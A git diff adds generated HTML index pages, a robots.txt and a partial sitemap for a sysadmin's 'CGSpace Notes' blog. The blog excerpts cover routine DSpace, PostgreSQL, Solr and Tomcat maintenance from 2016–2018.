+ + + + + + + + + diff --git a/docs/posts/page/7/index.html b/docs/posts/page/7/index.html new file mode 100644 index 000000000..5444a07e1 --- /dev/null +++ b/docs/posts/page/7/index.html @@ -0,0 +1,497 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

September, 2018

+ +
+

2018-09-02

+
    +
  • New PostgreSQL JDBC driver version 42.2.5
  • +
  • I’ll update the DSpace role in our Ansible infrastructure playbooks and run the updated playbooks on CGSpace and DSpace Test
  • +
  • Also, I’ll re-run the postgresql tasks because the custom PostgreSQL variables are dynamic according to the system’s RAM, and we never re-ran them after migrating to larger Linodes last month
  • +
  • I’m testing the new DSpace 5.8 branch in my Ubuntu 18.04 environment and I’m getting those autowire errors in Tomcat 8.5.30 again:
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2018

+ +
+

2018-08-01

+
    +
  • DSpace Test had crashed at some point yesterday morning and I see the following in dmesg:
  • +
+
[Tue Jul 31 00:00:41 2018] Out of memory: Kill process 1394 (java) score 668 or sacrifice child
+[Tue Jul 31 00:00:41 2018] Killed process 1394 (java) total-vm:15601860kB, anon-rss:5355528kB, file-rss:0kB, shmem-rss:0kB
+[Tue Jul 31 00:00:41 2018] oom_reaper: reaped process 1394 (java), now anon-rss:0kB, file-rss:0kB, shmem-rss:0kB
+
    +
  • Judging from the time of the crash it was probably related to the Discovery indexing that starts at midnight
  • +
  • From the DSpace log I see that eventually Solr stopped responding, so I guess the java process that was OOM killed above was Tomcat’s
  • +
  • I’m not sure why Tomcat didn’t crash with an OutOfMemoryError…
  • +
  • Anyways, perhaps I should increase the JVM heap from 5120m to 6144m like we did a few months ago when we tried to run the whole CGSpace Solr core
  • +
  • The server only has 8GB of RAM so we’ll eventually need to upgrade to a larger one because we’ll start starving the OS, PostgreSQL, and command line batch processes
  • +
  • I ran all system updates on DSpace Test and rebooted it
  • +
+ Read more → +
+ + + + + + +
+
+

July, 2018

+ +
+

2018-07-01

+
    +
  • I want to upgrade DSpace Test to DSpace 5.8 so I took a backup of its current database just in case:
  • +
+
$ pg_dump -b -v -o --format=custom -U dspace -f dspace-2018-07-01.backup dspace
+
    +
  • During the mvn package stage on the 5.8 branch I kept getting issues with java running out of memory:
  • +
+
There is insufficient memory for the Java Runtime Environment to continue.
+
+ Read more → +
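That error is the operating system refusing to give the JVM more native memory rather than a Java heap overflow, so the usual workarounds are capping Maven's heap and/or adding temporary swap, roughly like this (values are illustrative):
$ export MAVEN_OPTS="-Xmx512m"
# fallocate -l 2G /swapfile && chmod 600 /swapfile && mkswap /swapfile && swapon /swapfile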
+ + + + + + +
+
+

June, 2018

+ +
+

2018-06-04

+
    +
  • Test the DSpace 5.8 module upgrades from Atmire (#378) +
      +
    • There seems to be a problem with the CUA and L&R versions in pom.xml because they are using SNAPSHOT and it doesn’t build
    • +
    +
  • +
  • I added the new CCAFS Phase II Project Tag PII-FP1_PACCA2 and merged it into the 5_x-prod branch (#379)
  • +
  • I proofed and tested the ILRI author corrections that Peter sent back to me this week:
  • +
+
$ ./fix-metadata-values.py -i /tmp/2018-05-30-Correct-660-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -t correct -m 3 -n
+
    +
  • I think a sane proofing workflow in OpenRefine is to apply the custom text facets for check/delete/remove and illegal characters that I developed in March, 2018
  • +
  • Time to index ~70,000 items on CGSpace:
  • +
+
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b                                  
+
+real    74m42.646s
+user    8m5.056s
+sys     2m7.289s
+
+ Read more → +
+ + + + + + +
+
+

May, 2018

+ +
+

2018-05-01

+
    +
  • I cleared the Solr statistics core on DSpace Test by issuing two commands directly to the Solr admin interface: +
      +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Cdelete%3E%3Cquery%3E*:*%3C/query%3E%3C/delete%3E
    • +
    • http://localhost:3000/solr/statistics/update?stream.body=%3Ccommit/%3E
    • +
    +
  • +
  • Then I reduced the JVM heap size from 6144 back to 5120m
  • +
  • Also, I switched it to use OpenJDK instead of Oracle Java, as well as re-worked the Ansible infrastructure scripts to support hosts choosing which distribution they want to use
  • +
+ Read more → +
+ + + + + + +
+
+

April, 2018

+ +
+

2018-04-01

+
    +
  • I tried to test something on DSpace Test but noticed that it has been down since god knows when
  • +
  • Catalina logs at least show some memory errors yesterday:
  • +
+ Read more → +
+ + + + + + +
+
+

March, 2018

+ +
+

2018-03-02

+
    +
  • Export a CSV of the IITA community metadata for Martin Mueller
  • +
+ Read more → +
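A community CSV export like that is just the stock metadata-export tool pointed at the community handle (the handle and output path below are placeholders):
$ [dspace]/bin/dspace metadata-export -i 10568/68616 -f /tmp/iita.csv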
+ + + + + + +
+
+

February, 2018

+ +
+

2018-02-01

+
    +
  • Peter gave feedback on the dc.rights proof of concept that I had sent him last week
  • +
  • We don’t need to distinguish between internal and external works, so that makes it just a simple list
  • +
  • Yesterday I figured out how to monitor DSpace sessions using JMX
  • +
  • I copied the logic in the jmx_tomcat_dbpools provided by Ubuntu’s munin-plugins-java package and used the stuff I discovered about JMX in 2018-01
  • +
+ Read more → +
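For context, exposing the JMX endpoint that munin reads is just a few JVM flags in Tomcat's environment (a local, unauthenticated sketch only; the port is arbitrary and a real server would want authentication):
CATALINA_OPTS="$CATALINA_OPTS -Dcom.sun.management.jmxremote -Dcom.sun.management.jmxremote.port=5400 -Dcom.sun.management.jmxremote.ssl=false -Dcom.sun.management.jmxremote.authenticate=false"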
+ + + + + + +
+
+

January, 2018

+ +
+

2018-01-02

+
    +
  • Uptime Robot noticed that CGSpace went down and up a few times last night, for a few minutes each time
  • +
  • I didn’t get any load alerts from Linode and the REST and XMLUI logs don’t show anything out of the ordinary
  • +
  • The nginx logs show HTTP 200s until 02/Jan/2018:11:27:17 +0000 when Uptime Robot got an HTTP 500
  • +
  • In dspace.log around that time I see many errors like “Client closed the connection before file download was complete”
  • +
  • And just before that I see this:
  • +
+
Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
+
    +
  • Ah hah! So the pool was actually empty!
  • +
  • I need to increase that, let’s try to bump it up from 50 to 75
  • +
  • After that one client got an HTTP 499 but then the rest were HTTP 200, so I don’t know what the hell Uptime Robot saw
  • +
  • I notice this error quite a few times in dspace.log:
  • +
+
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
+org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered " "]" "] "" at line 1, column 32.
+
    +
  • And there are many of these errors every day for the past month:
  • +
+
$ grep -c "Error while searching for sidebar facets" dspace.log.*
+dspace.log.2017-11-21:4
+dspace.log.2017-11-22:1
+dspace.log.2017-11-23:4
+dspace.log.2017-11-24:11
+dspace.log.2017-11-25:0
+dspace.log.2017-11-26:1
+dspace.log.2017-11-27:7
+dspace.log.2017-11-28:21
+dspace.log.2017-11-29:31
+dspace.log.2017-11-30:15
+dspace.log.2017-12-01:15
+dspace.log.2017-12-02:20
+dspace.log.2017-12-03:38
+dspace.log.2017-12-04:65
+dspace.log.2017-12-05:43
+dspace.log.2017-12-06:72
+dspace.log.2017-12-07:27
+dspace.log.2017-12-08:15
+dspace.log.2017-12-09:29
+dspace.log.2017-12-10:35
+dspace.log.2017-12-11:20
+dspace.log.2017-12-12:44
+dspace.log.2017-12-13:36
+dspace.log.2017-12-14:59
+dspace.log.2017-12-15:104
+dspace.log.2017-12-16:53
+dspace.log.2017-12-17:66
+dspace.log.2017-12-18:83
+dspace.log.2017-12-19:101
+dspace.log.2017-12-20:74
+dspace.log.2017-12-21:55
+dspace.log.2017-12-22:66
+dspace.log.2017-12-23:50
+dspace.log.2017-12-24:85
+dspace.log.2017-12-25:62
+dspace.log.2017-12-26:49
+dspace.log.2017-12-27:30
+dspace.log.2017-12-28:54
+dspace.log.2017-12-29:68
+dspace.log.2017-12-30:89
+dspace.log.2017-12-31:53
+dspace.log.2018-01-01:45
+dspace.log.2018-01-02:34
+
    +
  • Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let’s Encrypt if it’s just a handful of domains
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2017

+ +
+

2017-12-01

+
    +
  • Uptime Robot noticed that CGSpace went down
  • +
  • The logs say “Timeout waiting for idle object”
  • +
  • PostgreSQL activity says there are 115 connections currently
  • +
  • The list of connections to XMLUI and REST API for today:
  • +
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/8/index.html b/docs/posts/page/8/index.html new file mode 100644 index 000000000..a0b109222 --- /dev/null +++ b/docs/posts/page/8/index.html @@ -0,0 +1,444 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

November, 2017

+ +
+

2017-11-01

+
    +
  • The CORE developers responded to say they are looking into their bot not respecting our robots.txt
  • +
+

2017-11-02

+
    +
  • Today there have been no hits by CORE and no alerts from Linode (coincidence?)
  • +
+
# grep -c "CORE" /var/log/nginx/access.log
+0
+
    +
  • Generate list of authors on CGSpace for Peter to go through and correct:
  • +
+
dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/authors.csv with csv;
+COPY 54701
+
+ Read more → +
+ + + + + + +
+
+

October, 2017

+ +
+

2017-10-01

+ +
http://hdl.handle.net/10568/78495||http://hdl.handle.net/10568/79336
+
    +
  • There appears to be a pattern but I’ll have to look a bit closer and try to clean them up automatically, either in SQL or in OpenRefine
  • +
  • Add Katherine Lutz to the groups for content submission and edit steps of the CGIAR System collections
  • +
+ Read more → +
+ + + + + + +
+
+

CGIAR Library Migration

+ +
+

Rough notes for importing the CGIAR Library content. It was decided that this content would go to a new top-level community called CGIAR System Organization.

+ Read more → +
+ + + + + + +
+
+

September, 2017

+ +
+

2017-09-06

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 261% CPU for the past two hours
  • +
+

2017-09-07

+
    +
  • Ask Sisay to clean up the WLE approvers a bit, as Marianne’s user account is both in the approvers step as well as the group
  • +
+ Read more → +
+ + + + + + +
+
+

August, 2017

+ +
+

2017-08-01

+
    +
  • Linode sent an alert that CGSpace (linode18) was using 350% CPU for the past two hours
  • +
  • I looked in the Activity pane of the Admin Control Panel and it seems that Google, Baidu, Yahoo, and Bing are all crawling with massive numbers of bots concurrently (~100 total, mostly Baidu and Google)
  • +
  • The good thing is that, according to dspace.log.2017-08-01, they are all using the same Tomcat session
  • +
  • This means our Tomcat Crawler Session Valve is working
  • +
  • But many of the bots are browsing dynamic URLs like: +
      +
    • /handle/10568/3353/discover
    • +
    • /handle/10568/16510/browse
    • +
    +
  • +
  • The robots.txt only blocks the top-level /discover and /browse URLs… we will need to find a way to forbid them from accessing these!
  • +
  • Relevant issue from DSpace Jira (semi resolved in DSpace 6.0): https://jira.duraspace.org/browse/DS-2962
  • +
  • It turns out that we’re already adding the X-Robots-Tag "none" HTTP header, but this only forbids the search engine from indexing the page, not crawling it!
  • +
  • Also, the bot has to successfully browse the page first so it can receive the HTTP header…
  • +
  • We might actually have to block these requests with HTTP 403 depending on the user agent
  • +
  • Abenet pointed out that the CGIAR Library Historical Archive collection I sent July 20th only had ~100 entries, instead of 2415
  • +
  • This was due to newline characters in the dc.description.abstract column, which caused OpenRefine to choke when exporting the CSV
  • +
  • I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
  • +
  • Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
  • +
+ Read more → +
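A rough idea of what that HTTP 403 blocking could look like in nginx (purely a sketch; the user agent regex and the handle path pattern would need tuning before using it for real):
location ~ ^/handle/[0-9]+/[0-9]+/(discover|browse) {
    # hypothetical: refuse the big crawlers outright instead of relying on X-Robots-Tag
    if ($http_user_agent ~* (googlebot|bingbot|baiduspider|yandex)) {
        return 403;
    }
    # ...otherwise proxy to Tomcat as in the rest of the config
}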
+ + + + + + +
+
+

July, 2017

+ +
+

2017-07-01

+
    +
  • Run system updates and reboot DSpace Test
  • +
+

2017-07-04

+
    +
  • Merge changes for WLE Phase II theme rename (#329)
  • +
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • +
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • +
+ Read more → +
+ + + + + + +
+
+

June, 2017

+ +
+ 2017-06-01 After discussion with WLE and CGSpace content people, we decided to just add one metadata field for the WLE Research Themes The cg.identifier.wletheme field will be used for both Phase I and Phase II Research Themes Then we’ll create a new sub-community for Phase II and create collections for the research themes there The current “Research Themes” community will be renamed to “WLE Phase I Research Themes” Tagged all items in the current Phase I collections with their appropriate themes Create pull request to add Phase II research themes to the submission form: #328 Add cg. + Read more → +
+ + + + + + +
+
+

May, 2017

+ +
+ 2017-05-01 ICARDA apparently started working on CG Core on their MEL repository They have done a few cg.* fields, but not very consistent and even copy some of CGSpace items: https://mel.cgiar.org/xmlui/handle/20.500.11766/6911?show=full https://cgspace.cgiar.org/handle/10568/73683 2017-05-02 Atmire got back about the Workflow Statistics issue, and apparently it’s a bug in the CUA module so they will send us a pull request 2017-05-04 Sync DSpace Test with database and assetstore from CGSpace Re-deploy DSpace Test with Atmire’s CUA patch for workflow statistics, run system updates, and restart the server Now I can see the workflow statistics and am able to select users, but everything returns 0 items Megan says there are still some mapped items are not appearing since last week, so I forced a full index-discovery -b Need to remember to check if the collection has more items (currently 39 on CGSpace, but 118 on the freshly reindexed DSPace Test) tomorrow: https://cgspace. + Read more → +
+ + + + + + +
+
+

April, 2017

+ +
+

2017-04-02

+
    +
  • Merge one change to CCAFS flagships that I had forgotten to remove last month (“MANAGING CLIMATE RISK”): https://github.com/ilri/DSpace/pull/317
  • +
  • Quick proof-of-concept hack to add dc.rights to the input form, including some inline instructions/hints:
  • +
+

dc.rights in the submission form

+
    +
  • Remove redundant/duplicate text in the DSpace submission license
  • +
  • Testing the CMYK patch on a collection with 650 items:
  • +
+
$ [dspace]/bin/dspace filter-media -f -i 10568/16498 -p "ImageMagick PDF Thumbnail" -v >& /tmp/filter-media-cmyk.txt
+
+ Read more → +
+ + + + + + +
+
+

March, 2017

+ +
+

2017-03-01

+
    +
  • Run the 279 CIAT author corrections on CGSpace
  • +
+

2017-03-02

+
    +
  • Skype with Michael and Peter, discussing moving the CGIAR Library to CGSpace
  • +
  • CGIAR people possibly open to moving content, redirecting library.cgiar.org to CGSpace and letting CGSpace resolve their handles
  • +
  • They might come in at the top level in one “CGIAR System” community, or with several communities
  • +
  • I need to spend a bit of time looking at the multiple handle support in DSpace and see if new content can be minted in both handles, or just one?
  • +
  • Need to send Peter and Michael some notes about this in a few days
  • +
  • Also, need to consider talking to Atmire about hiring them to bring ORCiD metadata to REST / OAI
  • +
  • Filed an issue on DSpace issue tracker for the filter-media bug that causes it to process JPGs even when limiting to the PDF thumbnail plugin: DS-3516
  • +
  • Discovered that the ImageMagick filter-media plugin creates JPG thumbnails with the CMYK colorspace when the source PDF is using CMYK
  • +
  • Interestingly, it seems DSpace 4.x’s thumbnails were sRGB, but forcing regeneration using DSpace 5.x’s ImageMagick plugin creates CMYK JPGs if the source PDF was CMYK (see 10568/51999):
  • +
+
$ identify ~/Desktop/alc_contrastes_desafios.jpg
+/Users/aorth/Desktop/alc_contrastes_desafios.jpg JPEG 464x600 464x600+0+0 8-bit CMYK 168KB 0.000u 0:00.000
+
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/posts/page/9/index.html b/docs/posts/page/9/index.html new file mode 100644 index 000000000..b2979f1a5 --- /dev/null +++ b/docs/posts/page/9/index.html @@ -0,0 +1,453 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + CGSpace Notes + + + + + + + + + + + + + + + + + + + + + + +
+
+ +
+
+ + + + +
+
+

CGSpace Notes

+

Documenting day-to-day work on the CGSpace repository.

+
+
+ + + + +
+
+
+ + + + + + + + + +
+
+

February, 2017

+ +
+

2017-02-07

+
    +
  • An item was mapped twice erroneously again, so I had to remove one of the mappings manually:
  • +
+
dspace=# select * from collection2item where item_id = '80278';
+  id   | collection_id | item_id
+-------+---------------+---------
+ 92551 |           313 |   80278
+ 92550 |           313 |   80278
+ 90774 |          1051 |   80278
+(3 rows)
+dspace=# delete from collection2item where id = 92551 and item_id = 80278;
+DELETE 1
+
    +
  • Create issue on GitHub to track the addition of CCAFS Phase II project tags (#301)
  • +
  • Looks like we’ll be using cg.identifier.ccafsprojectpii as the field name
  • +
+ Read more → +
+ + + + + + +
+
+

January, 2017

+ +
+

2017-01-02

+
    +
  • I checked to see if the Solr sharding task that is supposed to run on January 1st had run and saw there was an error
  • +
  • I tested on DSpace Test as well and it doesn’t work there either
  • +
  • I asked on the dspace-tech mailing list because it seems to be broken, and actually now I’m not sure if we’ve ever had the sharding task run successfully over all these years
  • +
+ Read more → +
+ + + + + + +
+
+

December, 2016

+ +
+

2016-12-02

+
    +
  • CGSpace was down for five hours in the morning while I was sleeping
  • +
  • While looking in the logs for errors, I see tons of warnings about Atmire MQM:
  • +
+
2016-12-02 03:00:32,352 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail="dc.title", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail="THUMBNAIL", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail="-1", transactionID="TX157907838689377964651674089851855413607")
+2016-12-02 03:00:32,353 WARN  com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID="TX157907838689377964651674089851855413607")
+
    +
  • I see thousands of them in the logs for the last few months, so it’s not related to the DSpace 5.5 upgrade
  • +
  • I’ve raised a ticket with Atmire to ask
  • +
  • Another worrying error from dspace.log is:
  • +
+ Read more → +
+ + + + + + +
+
+

November, 2016

+ +
+

2016-11-01

+
    +
  • Add dc.type to the output options for Atmire’s Listings and Reports module (#286)
  • +
+

Listings and Reports with output type

+ Read more → +
+ + + + + + +
+
+

October, 2016

+ +
+

2016-10-03

+
    +
  • Testing adding ORCIDs to a CSV file for a single item to see if the author orders get messed up
  • +
  • Need to test the following scenarios to see how author order is affected: +
      +
    • ORCIDs only
    • +
    • ORCIDs plus normal authors
    • +
    +
  • +
  • I exported a random item’s metadata as CSV, deleted all columns except id and collection, and made a new column called ORCID:dc.contributor.author with the following random ORCIDs from the ORCID registry:
  • +
+
0000-0002-6115-0956||0000-0002-3812-8793||0000-0001-7462-405X
+
+ Read more → +
+ + + + + + +
+
+

September, 2016

+ +
+

2016-09-01

+
    +
  • Discuss helping CCAFS with some batch tagging of ORCID IDs for their authors
  • +
  • Discuss how the migration of CGIAR’s Active Directory to a flat structure will break our LDAP groups in DSpace
  • +
  • We had been using DC=ILRI to determine whether a user was ILRI or not
  • +
  • It looks like we might be able to use OUs now, instead of DCs:
  • +
+
$ ldapsearch -x -H ldaps://svcgroot2.cgiarad.org:3269/ -b "dc=cgiarad,dc=org" -D "admigration1@cgiarad.org" -W "(sAMAccountName=admigration1)"
+
+ Read more → +
+ + + + + + +
+
+

August, 2016

+ +
+

2016-08-01

+
    +
  • Add updated distribution license from Sisay (#259)
  • +
  • Play with upgrading Mirage 2 dependencies in bower.json because most are several versions out of date
  • +
  • Bootstrap is at 3.3.0 but upstream is at 3.3.7, and upgrading to anything beyond 3.3.1 breaks glyphicons and probably more
  • +
  • bower stuff is a dead end, waste of time, too many issues
  • +
  • Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of fonts)
  • +
  • Start working on DSpace 5.1 → 5.5 port:
  • +
+
$ git checkout -b 55new 5_x-prod
+$ git reset --hard ilri/5_x-prod
+$ git rebase -i dspace-5.5
+
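When the interactive rebase stops on one of our local patches, the usual loop applies (nothing DSpace-specific here):

$ git status                # see which files conflict
$ git add <resolved-files>
$ git rebase --continue     # or git rebase --skip to drop a patch that 5.5 already includes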
+ Read more → +
+ + + + + + +
+
+

July, 2016

+ +
+

2016-07-01

+
    +
  • Add dc.description.sponsorship to Discovery sidebar facets and make investors clickable in item view (#232)
  • +
  • I think this query should find and replace all authors that have “,” at the end of their names:
  • +
+
dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+UPDATE 95
+dspacetest=# select text_value from  metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
+ text_value
+------------
+(0 rows)
+
    +
  • In this case the select query was showing 95 results before the update
  • +
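For similar cleanups it might be safer to eyeball the replacement before running the UPDATE; a sketch using the same field and regex:

dspacetest=# select text_value, regexp_replace(text_value, '(^.+?),$', '\1') from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$' limit 10;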
+ Read more → +
+ + + + + + +
+
+

June, 2016

+ +
+

2016-06-01

+ + Read more → +
+ + + + + + +
+
+

May, 2016

+ +
+

2016-05-01

+
    +
  • Since yesterday there have been 10,000 REST errors and the site has been unstable again
  • +
  • I have blocked access to the API now
  • +
  • There are 3,000 IPs accessing the REST API in a 24-hour period!
  • +
+
# awk '{print $1}' /var/log/nginx/rest.log  | uniq | wc -l
+3168
+
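Note that uniq only collapses adjacent duplicate lines, so without a sort that figure can overcount; a variant that counts truly unique IPs and shows the heaviest ones:

# awk '{print $1}' /var/log/nginx/rest.log | sort -u | wc -l
# awk '{print $1}' /var/log/nginx/rest.log | sort | uniq -c | sort -rn | head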
+ Read more → +
+ + + + + + + + + + + +
+ + + + +
+
+ + + + + + + + + diff --git a/docs/robots.txt b/docs/robots.txt new file mode 100644 index 000000000..c96d18e5c --- /dev/null +++ b/docs/robots.txt @@ -0,0 +1,106 @@ +User-agent: * + + +Disallow: /cgspace-notes/categories/ +Disallow: /cgspace-notes/ +Disallow: /cgspace-notes/2023-07/ +Disallow: /cgspace-notes/categories/notes/ +Disallow: /cgspace-notes/posts/ +Disallow: /cgspace-notes/2023-06/ +Disallow: /cgspace-notes/2023-05/ +Disallow: /cgspace-notes/2023-04/ +Disallow: /cgspace-notes/2023-03/ +Disallow: /cgspace-notes/2023-02/ +Disallow: /cgspace-notes/2023-01/ +Disallow: /cgspace-notes/2022-12/ +Disallow: /cgspace-notes/2022-11/ +Disallow: /cgspace-notes/2022-10/ +Disallow: /cgspace-notes/2022-09/ +Disallow: /cgspace-notes/2022-08/ +Disallow: /cgspace-notes/2022-07/ +Disallow: /cgspace-notes/2022-06/ +Disallow: /cgspace-notes/2022-05/ +Disallow: /cgspace-notes/2022-04/ +Disallow: /cgspace-notes/2022-03/ +Disallow: /cgspace-notes/2022-02/ +Disallow: /cgspace-notes/2022-01/ +Disallow: /cgspace-notes/2021-12/ +Disallow: /cgspace-notes/2021-11/ +Disallow: /cgspace-notes/2021-10/ +Disallow: /cgspace-notes/2021-09/ +Disallow: /cgspace-notes/2021-08/ +Disallow: /cgspace-notes/2021-07/ +Disallow: /cgspace-notes/2021-06/ +Disallow: /cgspace-notes/2021-05/ +Disallow: /cgspace-notes/2021-04/ +Disallow: /cgspace-notes/2021-03/ +Disallow: /cgspace-notes/cgspace-cgcorev2-migration/ +Disallow: /cgspace-notes/tags/migration/ +Disallow: /cgspace-notes/tags/ +Disallow: /cgspace-notes/2021-02/ +Disallow: /cgspace-notes/2021-01/ +Disallow: /cgspace-notes/2020-12/ +Disallow: /cgspace-notes/cgspace-dspace6-upgrade/ +Disallow: /cgspace-notes/2020-11/ +Disallow: /cgspace-notes/2020-10/ +Disallow: /cgspace-notes/2020-09/ +Disallow: /cgspace-notes/2020-08/ +Disallow: /cgspace-notes/2020-07/ +Disallow: /cgspace-notes/2020-06/ +Disallow: /cgspace-notes/2020-05/ +Disallow: /cgspace-notes/2020-04/ +Disallow: /cgspace-notes/2020-03/ +Disallow: /cgspace-notes/2020-02/ +Disallow: /cgspace-notes/2020-01/ +Disallow: /cgspace-notes/2019-12/ +Disallow: /cgspace-notes/2019-11/ +Disallow: /cgspace-notes/2019-10/ +Disallow: /cgspace-notes/2019-09/ +Disallow: /cgspace-notes/2019-08/ +Disallow: /cgspace-notes/2019-07/ +Disallow: /cgspace-notes/2019-06/ +Disallow: /cgspace-notes/2019-05/ +Disallow: /cgspace-notes/2019-04/ +Disallow: /cgspace-notes/2019-03/ +Disallow: /cgspace-notes/2019-02/ +Disallow: /cgspace-notes/2019-01/ +Disallow: /cgspace-notes/2018-12/ +Disallow: /cgspace-notes/2018-11/ +Disallow: /cgspace-notes/2018-10/ +Disallow: /cgspace-notes/2018-09/ +Disallow: /cgspace-notes/2018-08/ +Disallow: /cgspace-notes/2018-07/ +Disallow: /cgspace-notes/2018-06/ +Disallow: /cgspace-notes/2018-05/ +Disallow: /cgspace-notes/2018-04/ +Disallow: /cgspace-notes/2018-03/ +Disallow: /cgspace-notes/2018-02/ +Disallow: /cgspace-notes/2018-01/ +Disallow: /cgspace-notes/2017-12/ +Disallow: /cgspace-notes/2017-11/ +Disallow: /cgspace-notes/2017-10/ +Disallow: /cgspace-notes/cgiar-library-migration/ +Disallow: /cgspace-notes/tags/notes/ +Disallow: /cgspace-notes/2017-09/ +Disallow: /cgspace-notes/2017-08/ +Disallow: /cgspace-notes/2017-07/ +Disallow: /cgspace-notes/2017-06/ +Disallow: /cgspace-notes/2017-05/ +Disallow: /cgspace-notes/2017-04/ +Disallow: /cgspace-notes/2017-03/ +Disallow: /cgspace-notes/2017-02/ +Disallow: /cgspace-notes/2017-01/ +Disallow: /cgspace-notes/2016-12/ +Disallow: /cgspace-notes/2016-11/ +Disallow: /cgspace-notes/2016-10/ +Disallow: /cgspace-notes/2016-09/ +Disallow: /cgspace-notes/2016-08/ +Disallow: 
/cgspace-notes/2016-07/ +Disallow: /cgspace-notes/2016-06/ +Disallow: /cgspace-notes/2016-05/ +Disallow: /cgspace-notes/2016-04/ +Disallow: /cgspace-notes/2016-03/ +Disallow: /cgspace-notes/2016-02/ +Disallow: /cgspace-notes/2016-01/ +Disallow: /cgspace-notes/2015-12/ +Disallow: /cgspace-notes/2015-11/ diff --git a/docs/sitemap.xml b/docs/sitemap.xml new file mode 100644 index 000000000..79026099f --- /dev/null +++ b/docs/sitemap.xml @@ -0,0 +1,314 @@ + + + + https://alanorth.github.io/cgspace-notes/categories/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/2023-07/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/categories/notes/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/posts/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/2023-06/ + 2023-07-01T17:17:31+03:00 + + https://alanorth.github.io/cgspace-notes/2023-05/ + 2023-05-30T20:19:17+03:00 + + https://alanorth.github.io/cgspace-notes/2023-04/ + 2023-05-04T14:44:51+03:00 + + https://alanorth.github.io/cgspace-notes/2023-03/ + 2023-04-02T09:16:25+03:00 + + https://alanorth.github.io/cgspace-notes/2023-02/ + 2023-03-01T08:30:25+03:00 + + https://alanorth.github.io/cgspace-notes/2023-01/ + 2023-03-14T14:30:17+03:00 + + https://alanorth.github.io/cgspace-notes/2022-12/ + 2023-01-01T10:12:13+02:00 + + https://alanorth.github.io/cgspace-notes/2022-11/ + 2023-01-04T10:53:02+03:00 + + https://alanorth.github.io/cgspace-notes/2022-10/ + 2023-04-18T11:08:15-07:00 + + 